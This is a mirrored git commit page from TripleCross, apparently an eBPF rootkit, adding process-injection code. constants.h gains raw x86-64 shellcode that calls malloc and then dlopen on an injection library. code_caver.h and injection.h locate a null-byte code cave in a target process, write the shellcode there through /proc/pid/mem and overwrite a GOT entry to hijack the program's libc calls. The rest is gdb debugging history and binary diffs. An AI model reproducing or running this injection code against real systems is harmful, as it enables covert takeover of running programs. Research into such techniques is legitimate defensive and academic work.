admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-16 23:33:06 +08:00
Code Issues Packages Projects Releases Wiki Activity

Introduced shellcode and finished code cave writing and injection. RELRO working

Browse Source
This commit is contained in:
h3xduck
2022-04-07 11:54:24 -04:00
parent 3455b80010
commit be5605db5f
9 changed files with 3241 additions and 3124 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

5973
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

BIN
src/bin/kit
View File

Binary file not shown.

22
src/common/constants.h
View File

@@ -24,6 +24,26 @@
//LIBRARY INJECTION WITH ROP //LIBRARY INJECTION WITH ROP
#define TASK_COMM_NAME_ROP_TARGET "simple_timer" #define TASK_COMM_NAME_ROP_TARGET "simple_timer"
#define CODE_CAVE_ADDRESS 0x0000000000402e95 #define CODE_CAVE_ADDRESS_STATIC 0x0000000000402e95
#define CODE_CAVE_SHELLCODE_ASSEMBLE_1 \
"\xbf\x00\x20\x00\x00\x48\xbb"
#define CODE_CAVE_SHELLCODE_ASSEMBLE_1_LEN 7
#define CODE_CAVE_SHELLCODE_ASSEMBLE_2 \
"\xff\xd3\x48\x89\xc3\xc7\x00\x2f\x68\x6f\x6d\
\xc7\x40\x04\x65\x2f\x6f\x73\xc7\x40\x08\x62\x6f\x78\
\x65\xc7\x40\x0c\x73\x2f\x54\x46\xc7\x40\x10\x47\x2f\
\x73\x72\xc7\x40\x14\x63\x2f\x68\x65\xc7\x40\x18\x6c\
\x70\x65\x72\xc7\x40\x1c\x73\x2f\x69\x6e\xc7\x40\x20\
\x6a\x65\x63\x74\xc7\x40\x24\x69\x6f\x6e\x5f\xc7\x40\
\x28\x6c\x69\x62\x2e\xc7\x40\x2c\x73\x6f\x00\x00\x48\
\xb8"
#define CODE_CAVE_SHELLCODE_ASSEMBLE_2_LEN 90
#define CODE_CAVE_SHELLCODE_ASSEMBLE_3 \
"\xbe\x01\x00\x00\x00\x48\x89\xdf\x48\x89\xdc\
\x48\x81\xc4\x00\x10\x00\x00\x48\x89\xe5\xff\xd0"
#define CODE_CAVE_SHELLCODE_ASSEMBLE_3_LEN 23
#endif #endif

2
src/ebpf/include/bpf/injection.h
View File

@@ -164,7 +164,7 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
bpf_probe_read_user(&got_addr, sizeof(__u64), j_addr); bpf_probe_read_user(&got_addr, sizeof(__u64), j_addr);
bpf_printk("GOT_ADDR: %lx\n",got_addr); bpf_printk("GOT_ADDR: %lx\n",got_addr);
__u64 buf = CODE_CAVE_ADDRESS; __u64 buf = (__u64)CODE_CAVE_ADDRESS_STATIC;
bpf_printk("Now writing to J_ADDR %lx\n", j_addr); bpf_printk("Now writing to J_ADDR %lx\n", j_addr);
if(bpf_probe_write_user(j_addr, &buf, sizeof(__u64))<0){ if(bpf_probe_write_user(j_addr, &buf, sizeof(__u64))<0){
//Should not work if RELRO active //Should not work if RELRO active

243
src/helpers/.gdb_history
View File

@@ -1,129 +1,4 @@
q q
b *(test_time_values_injection+96)
r
si
x/2i 0x5555555556a9
x/2b 0x5555555556a9
x/22b 0x5555555556a9
q
b *(test_time_values_injection+96)
r
q
b *(test_time_values_injection+167)
r
si
q
b *(test_time_values_injection+167)
r
x/10s 0x41350
x/10s 0x405130
x/10b 0x405130
x/10i 0x405130
q
r
q
r
q
disass test_time_values_injection
b *(test_time_values_injection+94)
r
si
fin
fin
si
q
b *(test_time_values_injection+94)
r
si
x/20b 0x555555559fb0
si
x/20b 0x555555559fb0
q
r
q
r
q
b *(test_time_values_injection+94)
r
si
si
x/20b 0x555555559fb0
x/20i 0x555555559fb0
q
b *(test_time_values_injection+94)
r
si
x/20i 0x555555559fb0
x/20b 0x555555559fb0
si
x/20b 0x555555559fb0
x/20i 0x555555559fb0
q
r
q
r
q
r
q
r
q
r
q
b *(test_time_values_injection+94)
r
si
x/20b 0x555555559fb0
x/20x 0x555555559fb0
si
x/20x 0x555555559fb0
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
x/20x 0x555555559fb0
q
x/20x 0x555555559fb0
b *(test_time_values_injection+94)
r
si
x/20x 0x555555559fb0
fin
si
ni
ni
c
q
b test_time_values_injection
r
disass test_time_values_injection
b *(test_time_values_injection+94)
b *(test_time_values_injection+177)
c
c
r
q
b *(test_time_values_injection+94)
r
ni
disass /r test_time_values_injection
q
b *(test_time_values_injection+94)
r
si
ni
q
disass main disass main
q q
disass main disass main
@@ -261,3 +136,121 @@ r
q q
r r
q q
b *(main+184)
r
si
q
b *(main+184)
r
si
q
b *(main+184)
r
si
find 0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
find 0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x555555555000 0x555555556000
q
b *(main+184)
r
si
x/20i 0x555555559fb0
x/20b 0x555555559fb0
c
q
x/20b 0x555555559fb0
b *(main+184)
r
si
x/20b 0x555555559fb0
x/20b 0x555555557df0
q
b *(main+184)
r
si
q
b *(main+184)
r
si
b *(main+446)
c
si
x/20b 0x555555557fd0
x/20i 0x555555557fd0
x/20i 0x555555555664
x/20b 0x555555557fd0
x/20b 0x555555555664
q
b *(main+446)
r
si
x/20b 0x555555555664
q
b *(main+446)
b *(main+184)
r
x/20b 0x555555555664
q
b *(main+446)
r
si
x/20b 0x555555555664
q
b *(main+446)
r
si
x/20b 0x555555555664
q
b *(main+446)
r
Q
q
b *(main+446)
r
si
x/40i 0x555555555664
x/40b 0x555555555664
q
b *(main+446)
r
si
x/40i 0x555555555664
q
b *(main+446)
r
si
x/40i 0x555555555664
x/40b 0x5555555556c6
q
b *(main+446)
r
si
x/40i 0x555555555664
ni
x/40b 0x5555555556c6
x/40i 0x555555555664
x/40b 0x5555555556c6
x/40i 0x555555555664
x/40b 0x555555555664
disass /r 0x555555555664
q
b *(main+446)
r
si
x/40b 0x555555555664
x/4i 0x555555555664
q
b *(main+446)
r
si
x/4i 0x555555555664
x/32b 0x555555555664
q
b *(main+446)
r
si
fin
ni
si
fin
si
q

2
src/helpers/peda-session-simple_timer.txt
View File

@@ -1,2 +1,2 @@
break *(main+184) break *(main+446)

98
src/user/include/utils/mem/code_caver.h
View File

@@ -10,8 +10,102 @@
#include "../common/constants.h" #include "../common/constants.h"
__u64 code_cave_find_address(__u64 min_cave_size, __u64 from, __u64 to, char flags[], __u32 pgoff, __u32 major, __u32 minor, __u64 ino){ #define CODE_CAVE_LENGTH_BYTES 0x40
//printf("%x-%x %4c %x %x:%x %lu "); #define NULL_BYTE 0x00
__u64 cave_find(int mem_fd, int cave_length, __u64 from, __u64 to){
int null_counter = 0;
lseek(mem_fd, from, SEEK_SET);
for(__u64 ii = from; ii<to; ii++){
char c;
read(mem_fd, &c, 1);
if(c == NULL_BYTE){
null_counter++;
}else{
null_counter = 0;
}
if(null_counter >= CODE_CAVE_LENGTH_BYTES){
printf("Found code cave at %llx\n", ii);
return ii;
}
}
printf("Cave not found between %llx and %llx\n", from, to);
return 0;
}
__u64 code_cave_find_address(int mem_fd, __u64 from, __u64 to, char flags[], __u32 pgoff, __u32 major, __u32 minor, __u64 ino){
__u64 cave_addr;
cave_addr = cave_find(mem_fd, CODE_CAVE_LENGTH_BYTES, from, to);
return cave_addr;
}
int code_cave_write_shellcode(int mem_fd, __u64 cave_addr, __u64 got_addr, __u64 malloc_addr, __u64 dlopen_addr){
//Writing the code cave address in the GOT section, future calls to libc will be redirected
size_t len = sizeof(__u64);
__u64 buf_n = (__u64)cave_addr;
lseek(mem_fd, got_addr, SEEK_SET);
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)&buf_n+ii, 1) < 0 ){
perror("Error while writing at GOT");
return -1;
}
}
//First part of shellcode
len = CODE_CAVE_SHELLCODE_ASSEMBLE_1_LEN;
char* buf_c = CODE_CAVE_SHELLCODE_ASSEMBLE_1;
lseek(mem_fd, cave_addr, SEEK_SET);
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)buf_c+ii, 1) < 0 ){
perror("Error while writing shellcode 1");
return -1;
}
}
//Writing malloc address
len = sizeof(__u64);
buf_n = (__u64)malloc_addr;
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)&buf_n+ii, 1) < 0 ){
perror("Error while writing malloc address");
return -1;
}
}
//Second part of shellcode
len = CODE_CAVE_SHELLCODE_ASSEMBLE_2_LEN;
buf_c = CODE_CAVE_SHELLCODE_ASSEMBLE_2;
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)buf_c+ii, 1) < 0 ){
perror("Error while writing shellcode 2");
return -1;
}
}
//Writing dlopen address
len = sizeof(__u64);
buf_n = (__u64)dlopen_addr;
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)&buf_n+ii, 1) < 0 ){
perror("Error while writing dlopen address");
return -1;
}
}
//Third part of shellcode
len = CODE_CAVE_SHELLCODE_ASSEMBLE_3_LEN;
buf_c = CODE_CAVE_SHELLCODE_ASSEMBLE_3;
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)buf_c+ii, 1) < 0 ){
perror("Error while writing shellcode 3");
return -1;
}
}
printf("Finished writing shellcode at %llx\n", cave_addr);
return 0; return 0;
} }

25
src/user/include/utils/mem/injection.h
View File

@@ -14,7 +14,7 @@
int manage_injection(const struct rb_event* event){ int manage_injection(const struct rb_event* event){
char mem_file_name[100]; char mem_file_name[100];
__u64 buf = (__u64)CODE_CAVE_ADDRESS; __u64 buf = (__u64)CODE_CAVE_ADDRESS_STATIC;
int mem_fd; int mem_fd;
@@ -24,18 +24,18 @@ int manage_injection(const struct rb_event* event){
sprintf(mem_file_name, "/proc/%d/mem", event->pid); sprintf(mem_file_name, "/proc/%d/mem", event->pid);
mem_fd = open(mem_file_name, O_RDWR); mem_fd = open(mem_file_name, O_RDWR);
lseek(mem_fd, event->got_address, SEEK_SET); //lseek(mem_fd, event->got_address, SEEK_SET);
for(int ii=0; ii<sizeof(__u64); ii++){ /*for(int ii=0; ii<sizeof(__u64); ii++){
if(write(mem_fd, (void*)&buf+ii, 1) < 0 ){ if(write(mem_fd, (void*)&buf+ii, 1) < 0 ){
perror("Error while writing at GOT"); perror("Error while writing at GOT");
return -1; return -1;
} }
} }*/
//Parsing /proc/pid/maps. //Parsing /proc/pid/maps.
//Note that addresses usually appear as 32-bit when catting, but this is not completely true //Note that addresses usually appear as 32-bit when catting, but this is not completely true, 0s are ommitted
// //Considering them as 64-bit
char *maps_file = calloc(512, sizeof(char)); char *maps_file = calloc(512, sizeof(char));
FILE *f; FILE *f;
sprintf(maps_file, "/proc/%d/maps", event->pid); sprintf(maps_file, "/proc/%d/maps", event->pid);
@@ -44,17 +44,26 @@ int manage_injection(const struct rb_event* event){
__u32 pgoff, major, minor; __u32 pgoff, major, minor;
__u64 from, to, ino; __u64 from, to, ino;
char flags[4]; char flags[4];
int ret = sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino); sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino);
printf("MAPS: %s\n", maps_file); printf("MAPS: %s\n", maps_file);
//Parse flags, find executable one //Parse flags, find executable one
if(flags[2] == 'x'){ if(flags[2] == 'x'){
//Candidate for code cave finding //Candidate for code cave finding
__u64 cave_addr = code_cave_find_address(mem_fd, from, to, flags, pgoff, major, minor, ino);
if(cave_addr!=0){
//Found valid cave.
if(code_cave_write_shellcode(mem_fd, cave_addr, event->got_address, event->libc_malloc_address, event->libc_dlopen_mode_address)<0){
printf("Continuing with next cave candidate. Some writes might have been performed already\n");
}
printf("Successfully hijacked GOT\n");
break;
}
} }
} }
free(maps_file); free(maps_file);
close(mem_fd);
return 0; return 0;
} }